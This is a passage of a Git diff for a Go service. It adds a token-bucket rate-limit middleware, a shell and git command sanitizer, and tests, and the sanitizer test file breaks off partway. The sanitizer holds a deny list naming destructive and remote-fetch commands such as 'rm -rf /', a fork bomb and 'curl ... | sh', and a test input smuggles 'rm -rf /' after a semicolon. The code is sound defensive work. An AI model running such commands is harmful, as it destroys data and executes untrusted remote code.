// DefaultConfig returns a sensible default configuration.
|
||||
func DefaultConfig() Config {
|
||||
return Config{
|
||||
RequestsPerMinute: 100,
|
||||
BurstSize: 50,
|
||||
CleanupInterval: 5 * time.Minute,
|
||||
}
|
||||
}
|
||||
|
||||
// Limiter implements token bucket rate limiting.
|
||||
type Limiter struct {
|
||||
cfg Config
|
||||
buckets map[string]*bucket
|
||||
mu sync.RWMutex
|
||||
stopCh chan struct{}
|
||||
}
|
||||
|
||||
type bucket struct {
|
||||
tokens float64
|
||||
lastUpdate time.Time
|
||||
}
|
||||
|
||||
// New creates a new rate limiter with the given configuration.
|
||||
func New(cfg Config) *Limiter {
|
||||
if cfg.RequestsPerMinute <= 0 {
|
||||
cfg.RequestsPerMinute = 100
|
||||
}
|
||||
if cfg.BurstSize <= 0 {
|
||||
cfg.BurstSize = cfg.RequestsPerMinute / 2
|
||||
if cfg.BurstSize < 1 {
|
||||
cfg.BurstSize = 1
|
||||
}
|
||||
}
|
||||
if cfg.CleanupInterval <= 0 {
|
||||
cfg.CleanupInterval = 5 * time.Minute
|
||||
}
|
||||
|
||||
l := &Limiter{
|
||||
cfg: cfg,
|
||||
buckets: make(map[string]*bucket),
|
||||
stopCh: make(chan struct{}),
|
||||
}
|
||||
|
||||
// Start cleanup goroutine
|
||||
go l.cleanup()
|
||||
|
||||
return l
|
||||
}
|
||||
|
||||
// Stop stops the background cleanup goroutine.
|
||||
func (l *Limiter) Stop() {
|
||||
close(l.stopCh)
|
||||
}
|
||||
|
||||
// Allow checks if a request is allowed under the rate limit.
|
||||
// Returns remaining tokens and whether the request is allowed.
|
||||
func (l *Limiter) Allow(key string) (remaining int, allowed bool) {
|
||||
now := time.Now()
|
||||
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
|
||||
b, exists := l.buckets[key]
|
||||
if !exists {
|
||||
b = &bucket{
|
||||
tokens: float64(l.cfg.BurstSize),
|
||||
lastUpdate: now,
|
||||
}
|
||||
l.buckets[key] = b
|
||||
}
|
||||
|
||||
// Refill tokens based on time elapsed
|
||||
elapsed := now.Sub(b.lastUpdate).Seconds()
|
||||
rate := float64(l.cfg.RequestsPerMinute) / 60.0 // tokens per second
|
||||
b.tokens += elapsed * rate
|
||||
if b.tokens > float64(l.cfg.BurstSize) {
|
||||
b.tokens = float64(l.cfg.BurstSize)
|
||||
}
|
||||
b.lastUpdate = now
|
||||
|
||||
// Try to consume a token
|
||||
if b.tokens >= 1 {
|
||||
b.tokens--
|
||||
return int(b.tokens), true
|
||||
}
|
||||
|
||||
return 0, false
|
||||
}
|
||||
|
||||
// Middleware returns an HTTP middleware that enforces rate limits.
|
||||
func (l *Limiter) Middleware() func(http.Handler) http.Handler {
|
||||
return func(next http.Handler) http.Handler {
|
||||
return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
// Get the rate limit key
|
||||
key := l.getKey(r)
|
||||
if key == "" {
|
||||
// No key means no rate limiting (e.g., health checks)
|
||||
next.ServeHTTP(w, r)
|
||||
return
|
||||
}
|
||||
|
||||
remaining, allowed := l.Allow(key)
|
||||
|
||||
// Set rate limit headers
|
||||
w.Header().Set("X-RateLimit-Limit", itoa(l.cfg.RequestsPerMinute))
|
||||
w.Header().Set("X-RateLimit-Remaining", itoa(remaining))
|
||||
|
||||
if !allowed {
|
||||
// Calculate retry time
|
||||
retryAfter := 60.0 / float64(l.cfg.RequestsPerMinute)
|
||||
w.Header().Set("Retry-After", itoa(int(retryAfter)+1))
|
||||
api.WriteError(w, r, http.StatusTooManyRequests, "RATE_LIMITED",
|
||||
"Rate limit exceeded. Please retry later.")
|
||||
return
|
||||
}
|
||||
|
||||
next.ServeHTTP(w, r)
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func (l *Limiter) getKey(r *http.Request) string {
|
||||
// Use custom key function if provided
|
||||
if l.cfg.KeyFunc != nil {
|
||||
return l.cfg.KeyFunc(r)
|
||||
}
|
||||
|
||||
// Default: use API key ID from context
|
||||
// This requires the auth middleware to run first
|
||||
if apiKey := auth.GetAPIKey(r.Context()); apiKey != nil {
|
||||
return apiKey.ID
|
||||
}
|
||||
|
||||
// Fallback: use client IP
|
||||
return getClientIP(r)
|
||||
}
|
||||
|
||||
func (l *Limiter) cleanup() {
|
||||
ticker := time.NewTicker(l.cfg.CleanupInterval)
|
||||
defer ticker.Stop()
|
||||
|
||||
for {
|
||||
select {
|
||||
case <-l.stopCh:
|
||||
return
|
||||
case <-ticker.C:
|
||||
l.doCleanup()
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
func (l *Limiter) doCleanup() {
|
||||
l.mu.Lock()
|
||||
defer l.mu.Unlock()
|
||||
|
||||
// Remove buckets that haven't been used in 2x cleanup interval
|
||||
threshold := time.Now().Add(-2 * l.cfg.CleanupInterval)
|
||||
|
||||
for key, b := range l.buckets {
|
||||
if b.lastUpdate.Before(threshold) {
|
||||
delete(l.buckets, key)
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// getClientIP extracts the client IP from the request.
|
||||
func getClientIP(r *http.Request) string {
|
||||
// Check X-Forwarded-For header (set by proxies/load balancers)
|
||||
if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
|
||||
// Take the first IP in the chain
|
||||
for i := 0; i < len(xff); i++ {
|
||||
if xff[i] == ',' {
|
||||
return xff[:i]
|
||||
}
|
||||
}
|
||||
return xff
|
||||
}
|
||||
|
||||
// Check X-Real-IP header
|
||||
if xri := r.Header.Get("X-Real-IP"); xri != "" {
|
||||
return xri
|
||||
}
|
||||
|
||||
// Fall back to RemoteAddr
|
||||
// RemoteAddr is "IP:port", so strip the port
|
||||
addr := r.RemoteAddr
|
||||
for i := len(addr) - 1; i >= 0; i-- {
|
||||
if addr[i] == ':' {
|
||||
return addr[:i]
|
||||
}
|
||||
}
|
||||
return addr
|
||||
}
|
||||
|
||||
// itoa converts an integer to a string without importing strconv.
|
||||
func itoa(i int) string {
|
||||
if i == 0 {
|
||||
return "0"
|
||||
}
|
||||
|
||||
negative := i < 0
|
||||
if negative {
|
||||
i = -i
|
||||
}
|
||||
|
||||
// Max int64 is 19 digits
|
||||
buf := make([]byte, 0, 20)
|
||||
|
||||
for i > 0 {
|
||||
buf = append(buf, byte('0'+i%10))
|
||||
i /= 10
|
||||
}
|
||||
|
||||
if negative {
|
||||
buf = append(buf, '-')
|
||||
}
|
||||
|
||||
// Reverse
|
||||
for left, right := 0, len(buf)-1; left < right; left, right = left+1, right-1 {
|
||||
buf[left], buf[right] = buf[right], buf[left]
|
||||
}
|
||||
|
||||
return string(buf)
|
||||
}
|
||||
|
||||
// KeyFromAPIKey creates a KeyFunc that extracts the API key ID for rate limiting.
|
||||
// This is useful when you want to rate limit by API key rather than IP.
|
||||
func KeyFromAPIKey() func(*http.Request) string {
|
||||
return func(r *http.Request) string {
|
||||
if apiKey := auth.GetAPIKey(r.Context()); apiKey != nil {
|
||||
return apiKey.ID
|
||||
}
|
||||
return getClientIP(r)
|
||||
}
|
||||
}
|
||||
|
||||
// KeyFromIP creates a KeyFunc that uses client IP for rate limiting.
|
||||
func KeyFromIP() func(*http.Request) string {
|
||||
return func(r *http.Request) string {
|
||||
return getClientIP(r)
|
||||
}
|
||||
}
|
||||
413
internal/ratelimit/ratelimit_test.go
Normal file
413
internal/ratelimit/ratelimit_test.go
Normal file
@ -0,0 +1,413 @@
|
||||
package ratelimit
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"net/http/httptest"
|
||||
"sync"
|
||||
"testing"
|
||||
"time"
|
||||
|
||||
"github.com/orchard9/rdev/internal/auth"
|
||||
)
|
||||
|
||||
func TestNew(t *testing.T) {
|
||||
t.Run("default config", func(t *testing.T) {
|
||||
l := New(Config{})
|
||||
defer l.Stop()
|
||||
|
||||
if l.cfg.RequestsPerMinute != 100 {
|
||||
t.Errorf("RequestsPerMinute = %d, want 100", l.cfg.RequestsPerMinute)
|
||||
}
|
||||
if l.cfg.BurstSize != 50 {
|
||||
t.Errorf("BurstSize = %d, want 50", l.cfg.BurstSize)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("custom config", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 200,
|
||||
BurstSize: 100,
|
||||
CleanupInterval: time.Minute,
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
if l.cfg.RequestsPerMinute != 200 {
|
||||
t.Errorf("RequestsPerMinute = %d, want 200", l.cfg.RequestsPerMinute)
|
||||
}
|
||||
if l.cfg.BurstSize != 100 {
|
||||
t.Errorf("BurstSize = %d, want 100", l.cfg.BurstSize)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestDefaultConfig(t *testing.T) {
|
||||
cfg := DefaultConfig()
|
||||
|
||||
if cfg.RequestsPerMinute != 100 {
|
||||
t.Errorf("RequestsPerMinute = %d, want 100", cfg.RequestsPerMinute)
|
||||
}
|
||||
if cfg.BurstSize != 50 {
|
||||
t.Errorf("BurstSize = %d, want 50", cfg.BurstSize)
|
||||
}
|
||||
if cfg.CleanupInterval != 5*time.Minute {
|
||||
t.Errorf("CleanupInterval = %v, want 5m", cfg.CleanupInterval)
|
||||
}
|
||||
}
|
||||
|
||||
func TestAllow(t *testing.T) {
|
||||
t.Run("allows requests within limit", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 60,
|
||||
BurstSize: 10,
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
// Should allow burst requests
|
||||
for i := 0; i < 10; i++ {
|
||||
remaining, allowed := l.Allow("test-key")
|
||||
if !allowed {
|
||||
t.Errorf("Request %d was denied, want allowed", i)
|
||||
}
|
||||
if remaining != 10-i-1 {
|
||||
t.Errorf("Request %d: remaining = %d, want %d", i, remaining, 10-i-1)
|
||||
}
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("denies requests exceeding limit", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 60,
|
||||
BurstSize: 5,
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
// Exhaust the bucket
|
||||
for i := 0; i < 5; i++ {
|
||||
l.Allow("test-key")
|
||||
}
|
||||
|
||||
// Next request should be denied
|
||||
_, allowed := l.Allow("test-key")
|
||||
if allowed {
|
||||
t.Error("Request was allowed, want denied")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("refills over time", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 60, // 1 per second
|
||||
BurstSize: 1,
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
// Use the one token
|
||||
l.Allow("test-key")
|
||||
|
||||
// Should be denied immediately
|
||||
_, allowed := l.Allow("test-key")
|
||||
if allowed {
|
||||
t.Error("Request was allowed immediately, want denied")
|
||||
}
|
||||
|
||||
// Wait for refill (1 token per second)
|
||||
time.Sleep(1100 * time.Millisecond)
|
||||
|
||||
// Should be allowed now
|
||||
_, allowed = l.Allow("test-key")
|
||||
if !allowed {
|
||||
t.Error("Request was denied after refill, want allowed")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("separate buckets per key", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 60,
|
||||
BurstSize: 1,
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
// Exhaust key1
|
||||
l.Allow("key1")
|
||||
_, allowed1 := l.Allow("key1")
|
||||
if allowed1 {
|
||||
t.Error("key1 was allowed, want denied")
|
||||
}
|
||||
|
||||
// key2 should still have tokens
|
||||
_, allowed2 := l.Allow("key2")
|
||||
if !allowed2 {
|
||||
t.Error("key2 was denied, want allowed")
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestMiddleware(t *testing.T) {
|
||||
handler := http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
|
||||
w.WriteHeader(http.StatusOK)
|
||||
w.Write([]byte("OK"))
|
||||
})
|
||||
|
||||
t.Run("allows requests within limit", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 100,
|
||||
BurstSize: 10,
|
||||
KeyFunc: KeyFromIP(),
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
middleware := l.Middleware()
|
||||
wrapped := middleware(handler)
|
||||
|
||||
req := httptest.NewRequest("GET", "/test", nil)
|
||||
req.RemoteAddr = "192.168.1.1:12345"
|
||||
rec := httptest.NewRecorder()
|
||||
|
||||
wrapped.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusOK {
|
||||
t.Errorf("Status = %d, want 200", rec.Code)
|
||||
}
|
||||
if rec.Header().Get("X-RateLimit-Limit") != "100" {
|
||||
t.Errorf("X-RateLimit-Limit = %q, want 100", rec.Header().Get("X-RateLimit-Limit"))
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("returns 429 when rate limited", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 60,
|
||||
BurstSize: 1,
|
||||
KeyFunc: KeyFromIP(),
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
middleware := l.Middleware()
|
||||
wrapped := middleware(handler)
|
||||
|
||||
// First request should succeed
|
||||
req1 := httptest.NewRequest("GET", "/test", nil)
|
||||
req1.RemoteAddr = "192.168.1.1:12345"
|
||||
rec1 := httptest.NewRecorder()
|
||||
wrapped.ServeHTTP(rec1, req1)
|
||||
|
||||
if rec1.Code != http.StatusOK {
|
||||
t.Errorf("First request status = %d, want 200", rec1.Code)
|
||||
}
|
||||
|
||||
// Second request should be rate limited
|
||||
req2 := httptest.NewRequest("GET", "/test", nil)
|
||||
req2.RemoteAddr = "192.168.1.1:12345"
|
||||
rec2 := httptest.NewRecorder()
|
||||
wrapped.ServeHTTP(rec2, req2)
|
||||
|
||||
if rec2.Code != http.StatusTooManyRequests {
|
||||
t.Errorf("Second request status = %d, want 429", rec2.Code)
|
||||
}
|
||||
if rec2.Header().Get("Retry-After") == "" {
|
||||
t.Error("Retry-After header not set")
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("no key means no rate limiting", func(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 60,
|
||||
BurstSize: 1,
|
||||
KeyFunc: func(r *http.Request) string {
|
||||
return "" // No key
|
||||
},
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
middleware := l.Middleware()
|
||||
wrapped := middleware(handler)
|
||||
|
||||
// Multiple requests should all succeed
|
||||
for i := 0; i < 5; i++ {
|
||||
req := httptest.NewRequest("GET", "/test", nil)
|
||||
rec := httptest.NewRecorder()
|
||||
wrapped.ServeHTTP(rec, req)
|
||||
|
||||
if rec.Code != http.StatusOK {
|
||||
t.Errorf("Request %d status = %d, want 200", i, rec.Code)
|
||||
}
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestGetClientIP(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
remoteAddr string
|
||||
xff string
|
||||
xri string
|
||||
want string
|
||||
}{
|
||||
{"from RemoteAddr", "192.168.1.1:12345", "", "", "192.168.1.1"},
|
||||
{"from X-Forwarded-For single", "127.0.0.1:8080", "10.0.0.1", "", "10.0.0.1"},
|
||||
{"from X-Forwarded-For multiple", "127.0.0.1:8080", "10.0.0.1, 10.0.0.2", "", "10.0.0.1"},
|
||||
{"from X-Real-IP", "127.0.0.1:8080", "", "10.0.0.5", "10.0.0.5"},
|
||||
{"X-Forwarded-For takes precedence", "127.0.0.1:8080", "10.0.0.1", "10.0.0.5", "10.0.0.1"},
|
||||
{"no port in RemoteAddr", "192.168.1.1", "", "", "192.168.1.1"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.name, func(t *testing.T) {
|
||||
req := httptest.NewRequest("GET", "/", nil)
|
||||
req.RemoteAddr = tt.remoteAddr
|
||||
if tt.xff != "" {
|
||||
req.Header.Set("X-Forwarded-For", tt.xff)
|
||||
}
|
||||
if tt.xri != "" {
|
||||
req.Header.Set("X-Real-IP", tt.xri)
|
||||
}
|
||||
|
||||
got := getClientIP(req)
|
||||
if got != tt.want {
|
||||
t.Errorf("getClientIP() = %q, want %q", got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestKeyFromAPIKey(t *testing.T) {
|
||||
keyFunc := KeyFromAPIKey()
|
||||
|
||||
t.Run("extracts from context", func(t *testing.T) {
|
||||
req := httptest.NewRequest("GET", "/", nil)
|
||||
apiKey := &auth.APIKey{ID: "test-key-123"}
|
||||
ctx := auth.WithAPIKey(req.Context(), apiKey)
|
||||
req = req.WithContext(ctx)
|
||||
|
||||
got := keyFunc(req)
|
||||
if got != "test-key-123" {
|
||||
t.Errorf("KeyFromAPIKey() = %q, want test-key-123", got)
|
||||
}
|
||||
})
|
||||
|
||||
t.Run("falls back to IP", func(t *testing.T) {
|
||||
req := httptest.NewRequest("GET", "/", nil)
|
||||
req.RemoteAddr = "192.168.1.100:12345"
|
||||
|
||||
got := keyFunc(req)
|
||||
if got != "192.168.1.100" {
|
||||
t.Errorf("KeyFromAPIKey() = %q, want 192.168.1.100", got)
|
||||
}
|
||||
})
|
||||
}
|
||||
|
||||
func TestKeyFromIP(t *testing.T) {
|
||||
keyFunc := KeyFromIP()
|
||||
|
||||
req := httptest.NewRequest("GET", "/", nil)
|
||||
req.RemoteAddr = "10.0.0.50:12345"
|
||||
|
||||
got := keyFunc(req)
|
||||
if got != "10.0.0.50" {
|
||||
t.Errorf("KeyFromIP() = %q, want 10.0.0.50", got)
|
||||
}
|
||||
}
|
||||
|
||||
func TestItoa(t *testing.T) {
|
||||
tests := []struct {
|
||||
input int
|
||||
want string
|
||||
}{
|
||||
{0, "0"},
|
||||
{1, "1"},
|
||||
{10, "10"},
|
||||
{100, "100"},
|
||||
{12345, "12345"},
|
||||
{-1, "-1"},
|
||||
{-12345, "-12345"},
|
||||
}
|
||||
|
||||
for _, tt := range tests {
|
||||
t.Run(tt.want, func(t *testing.T) {
|
||||
got := itoa(tt.input)
|
||||
if got != tt.want {
|
||||
t.Errorf("itoa(%d) = %q, want %q", tt.input, got, tt.want)
|
||||
}
|
||||
})
|
||||
}
|
||||
}
|
||||
|
||||
func TestConcurrentAccess(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 1000,
|
||||
BurstSize: 100,
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
var wg sync.WaitGroup
|
||||
var allowedCount, deniedCount int64
|
||||
var mu sync.Mutex
|
||||
|
||||
// Spawn many goroutines making requests
|
||||
for i := 0; i < 200; i++ {
|
||||
wg.Add(1)
|
||||
go func() {
|
||||
defer wg.Done()
|
||||
_, allowed := l.Allow("concurrent-test")
|
||||
mu.Lock()
|
||||
if allowed {
|
||||
allowedCount++
|
||||
} else {
|
||||
deniedCount++
|
||||
}
|
||||
mu.Unlock()
|
||||
}()
|
||||
}
|
||||
|
||||
wg.Wait()
|
||||
|
||||
// Should have allowed approximately BurstSize requests
|
||||
// and denied the rest
|
||||
if allowedCount < 90 || allowedCount > 110 {
|
||||
t.Errorf("allowedCount = %d, want ~100", allowedCount)
|
||||
}
|
||||
if deniedCount < 90 || deniedCount > 110 {
|
||||
t.Errorf("deniedCount = %d, want ~100", deniedCount)
|
||||
}
|
||||
}
|
||||
|
||||
func TestCleanup(t *testing.T) {
|
||||
l := New(Config{
|
||||
RequestsPerMinute: 60,
|
||||
BurstSize: 10,
|
||||
CleanupInterval: 50 * time.Millisecond,
|
||||
})
|
||||
defer l.Stop()
|
||||
|
||||
// Make some requests to create buckets
|
||||
l.Allow("key1")
|
||||
l.Allow("key2")
|
||||
|
||||
l.mu.RLock()
|
||||
bucketCount := len(l.buckets)
|
||||
l.mu.RUnlock()
|
||||
|
||||
if bucketCount != 2 {
|
||||
t.Errorf("bucketCount = %d, want 2", bucketCount)
|
||||
}
|
||||
|
||||
// Wait for cleanup (2x cleanup interval)
|
||||
time.Sleep(150 * time.Millisecond)
|
||||
|
||||
l.mu.RLock()
|
||||
bucketCount = len(l.buckets)
|
||||
l.mu.RUnlock()
|
||||
|
||||
// Buckets should be cleaned up
|
||||
if bucketCount != 0 {
|
||||
t.Errorf("bucketCount after cleanup = %d, want 0", bucketCount)
|
||||
}
|
||||
}
|
||||
|
||||
func TestStop(t *testing.T) {
|
||||
l := New(Config{})
|
||||
|
||||
// Should not panic when stopping
|
||||
l.Stop()
|
||||
|
||||
// Should not panic if stopped multiple times
|
||||
// (but this is technically undefined behavior - just testing it doesn't crash)
|
||||
}
|
||||
233
internal/sanitize/sanitize.go
Normal file
233
internal/sanitize/sanitize.go
Normal file
@ -0,0 +1,233 @@
|
||||
// Package sanitize provides command input sanitization to prevent injection attacks.
|
||||
package sanitize
|
||||
|
||||
import (
|
||||
"fmt"
|
||||
"regexp"
|
||||
"strings"
|
||||
)
|
||||
|
||||
// Package-level compiled regex patterns for performance.
|
||||
var (
|
||||
// Dangerous shell command patterns
|
||||
dangerousCommandPatterns = []*dangerousPattern{
|
||||
{regexp.MustCompile(`(?i)\brm\s+(-[rf]+\s+)*(/|~|\.\.|/etc|/var|/usr|/home|/root)`), "destructive rm command"},
|
||||
{regexp.MustCompile(`(?i)\bdd\s+`), "dd command"},
|
||||
{regexp.MustCompile(`(?i)\bmkfs\b`), "mkfs command"},
|
||||
{regexp.MustCompile(`(?i)\bfdisk\b`), "fdisk command"},
|
||||
{regexp.MustCompile(`(?i)\bshutdown\b`), "shutdown command"},
|
||||
{regexp.MustCompile(`(?i)\breboot\b`), "reboot command"},
|
||||
{regexp.MustCompile(`(?i)\bsystemctl\s+(stop|disable|mask|halt|poweroff)`), "dangerous systemctl command"},
|
||||
{regexp.MustCompile(`(?i)\bkill\s+-9\s+(-1|1)\b`), "kill all processes"},
|
||||
{regexp.MustCompile(`(?i)\bchmod\s+(-R\s+)?(777|666)\s+/`), "dangerous chmod on root"},
|
||||
{regexp.MustCompile(`(?i)\bchown\s+-R\s+\S+\s+/`), "dangerous chown on root"},
|
||||
{regexp.MustCompile(`(?i):\(\)\s*\{\s*:\s*\|\s*:\s*&\s*\}\s*;`), "fork bomb"},
|
||||
{regexp.MustCompile(`(?i)\bcurl\s+.*\|\s*(ba)?sh`), "remote code execution via curl"},
|
||||
{regexp.MustCompile(`(?i)\bwget\s+.*\|\s*(ba)?sh`), "remote code execution via wget"},
|
||||
}
|
||||
|
||||
// Stream ID validation pattern
|
||||
streamIDPattern = regexp.MustCompile(`^[a-zA-Z0-9][a-zA-Z0-9_-]*$`)
|
||||
)
|
||||
|
||||
// dangerousPattern pairs a compiled regex with its error reason.
|
||||
type dangerousPattern struct {
|
||||
pattern *regexp.Regexp
|
||||
reason string
|
||||
}
|
||||
|
||||
// Error types for sanitization failures.
|
||||
type Error struct {
|
||||
Reason string
|
||||
Input string
|
||||
Pattern string
|
||||
}
|
||||
|
||||
func (e *Error) Error() string {
|
||||
if e.Pattern != "" {
|
||||
return fmt.Sprintf("sanitization failed: %s (matched pattern: %q, input: %q)", e.Reason, e.Pattern, e.Input)
|
||||
}
|
||||
return fmt.Sprintf("sanitization failed: %s (input: %q)", e.Reason, e.Input)
|
||||
}
|
||||
|
||||
// ShellCommand validates and sanitizes a shell command.
|
||||
// Returns an error if the command contains dangerous patterns.
|
||||
func ShellCommand(cmd string) error {
|
||||
if strings.TrimSpace(cmd) == "" {
|
||||
return &Error{Reason: "empty command", Input: cmd}
|
||||
}
|
||||
|
||||
// Check for null bytes
|
||||
if strings.ContainsRune(cmd, '\x00') {
|
||||
return &Error{Reason: "contains null byte", Input: cmd}
|
||||
}
|
||||
|
||||
// Dangerous command chaining patterns
|
||||
chainPatterns := []string{
|
||||
`;`, // Command separator
|
||||
`&&`, // AND operator
|
||||
`||`, // OR operator
|
||||
`|`, // Pipe
|
||||
"`", // Backtick command substitution
|
||||
`$(`, // Command substitution
|
||||
`${`, // Variable expansion that could be exploited
|
||||
`>(`, // Process substitution
|
||||
`<(`, // Process substitution
|
||||
`\n`, // Newline (command separator in shell)
|
||||
`\r`, // Carriage return
|
||||
}
|
||||
|
||||
for _, pattern := range chainPatterns {
|
||||
if strings.Contains(cmd, pattern) {
|
||||
return &Error{
|
||||
Reason: "contains command chaining operator",
|
||||
Input: cmd,
|
||||
Pattern: pattern,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Dangerous redirect patterns
|
||||
redirectPatterns := []string{
|
||||
`>`, // Output redirect
|
||||
`>>`, // Append redirect
|
||||
`<`, // Input redirect
|
||||
}
|
||||
|
||||
for _, pattern := range redirectPatterns {
|
||||
if strings.Contains(cmd, pattern) {
|
||||
return &Error{
|
||||
Reason: "contains redirect operator",
|
||||
Input: cmd,
|
||||
Pattern: pattern,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
// Check against pre-compiled dangerous command patterns
|
||||
for _, dp := range dangerousCommandPatterns {
|
||||
if dp.pattern.MatchString(cmd) {
|
||||
return &Error{
|
||||
Reason: dp.reason,
|
||||
Input: cmd,
|
||||
Pattern: dp.pattern.String(),
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// GitArgs validates git command arguments.
|
||||
// Returns an error if any argument contains dangerous patterns.
|
||||
func GitArgs(args []string) error {
|
||||
if len(args) == 0 {
|
||||
return &Error{Reason: "empty git args"}
|
||||
}
|
||||
|
||||
// Dangerous git subcommands
|
||||
dangerousSubcommands := map[string]string{
|
||||
"config": "git config can modify system settings",
|
||||
"remote": "git remote can add malicious remotes",
|
||||
"push": "git push can modify remote repositories",
|
||||
}
|
||||
|
||||
// First arg is the subcommand
|
||||
subcommand := strings.ToLower(args[0])
|
||||
if reason, dangerous := dangerousSubcommands[subcommand]; dangerous {
|
||||
// push is allowed for specific use cases, block only with --force
|
||||
if subcommand == "push" {
|
||||
for _, arg := range args[1:] {
|
||||
if arg == "-f" || arg == "--force" || arg == "--force-with-lease" {
|
||||
return &Error{Reason: "force push not allowed", Input: strings.Join(args, " ")}
|
||||
}
|
||||
}
|
||||
} else {
|
||||
return &Error{Reason: reason, Input: strings.Join(args, " ")}
|
||||
}
|
||||
}
|
||||
|
||||
// Check all args for shell injection
|
||||
for _, arg := range args {
|
||||
if err := validateArg(arg); err != nil {
|
||||
return err
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// ClaudePrompt validates a Claude prompt.
|
||||
// This is relatively permissive since prompts are passed as a single argument to claude CLI.
|
||||
func ClaudePrompt(prompt string) error {
|
||||
if strings.TrimSpace(prompt) == "" {
|
||||
return &Error{Reason: "empty prompt"}
|
||||
}
|
||||
|
||||
// Check for null bytes
|
||||
if strings.ContainsRune(prompt, '\x00') {
|
||||
return &Error{Reason: "contains null byte", Input: prompt}
|
||||
}
|
||||
|
||||
// Limit length to prevent resource exhaustion
|
||||
const maxPromptLength = 100000 // 100KB
|
||||
if len(prompt) > maxPromptLength {
|
||||
return &Error{
|
||||
Reason: fmt.Sprintf("prompt too long (max %d bytes)", maxPromptLength),
|
||||
Input: prompt[:100] + "...",
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// validateArg validates a single command argument for shell injection.
|
||||
func validateArg(arg string) error {
|
||||
// Check for null bytes
|
||||
if strings.ContainsRune(arg, '\x00') {
|
||||
return &Error{Reason: "argument contains null byte", Input: arg}
|
||||
}
|
||||
|
||||
// Check for shell metacharacters that could break out of quoting
|
||||
shellMetachars := []string{
|
||||
"`", // Backtick
|
||||
`$(`, // Command substitution
|
||||
`${`, // Variable expansion
|
||||
}
|
||||
|
||||
for _, meta := range shellMetachars {
|
||||
if strings.Contains(arg, meta) {
|
||||
return &Error{
|
||||
Reason: "argument contains shell metacharacter",
|
||||
Input: arg,
|
||||
Pattern: meta,
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
|
||||
// StreamID validates a stream ID.
|
||||
// Stream IDs should be alphanumeric with hyphens and underscores only.
|
||||
func StreamID(id string) error {
|
||||
if id == "" {
|
||||
return nil // Empty is allowed (will be auto-generated)
|
||||
}
|
||||
|
||||
// Must be reasonable length
|
||||
if len(id) > 64 {
|
||||
return &Error{Reason: "stream ID too long (max 64 chars)", Input: id}
|
||||
}
|
||||
|
||||
// Must match safe pattern (uses pre-compiled regex)
|
||||
if !streamIDPattern.MatchString(id) {
|
||||
return &Error{
|
||||
Reason: "stream ID must be alphanumeric with hyphens/underscores",
|
||||
Input: id,
|
||||
Pattern: streamIDPattern.String(),
|
||||
}
|
||||
}
|
||||
|
||||
return nil
|
||||
}
|
||||
257
internal/sanitize/sanitize_test.go
Normal file
257
internal/sanitize/sanitize_test.go
Normal file
@ -0,0 +1,257 @@
|
||||
package sanitize
|
||||
|
||||
import (
|
||||
"strings"
|
||||
"testing"
|
||||
)
|
||||
|
||||
func TestShellCommand(t *testing.T) {
|
||||
tests := []struct {
|
||||
name string
|
||||
cmd string
|
||||
wantErr bool
|
||||
errMsg string
|
||||
}{
|
||||
// Valid commands
|
||||
{"simple ls", "ls -la", false, ""},
|
||||
{"cat file", "cat file.txt", false, ""},
|
||||
{"grep pattern", "grep -r pattern .", false, ""},
|
||||
{"make build", "make build", false, ""},
|
||||
{"go test", "go test ./...", false, ""},
|
||||
{"npm install", "npm install", false, ""},
|
||||
{"python script", "python script.py", false, ""},
|
||||
|
||||
// Empty/whitespace
|
||||
{"empty string", "", true, "empty command"},
|
||||
{"whitespace only", " ", true, "empty command"},
|
||||
|
||||
// Null bytes
|
||||
{"null byte", "ls\x00-la", true, "null byte"},
|
||||
|
||||
// Command chaining - semicolon
|
||||
{"semicolon", "ls; rm -rf /", true, "command chaining"},
|
||||
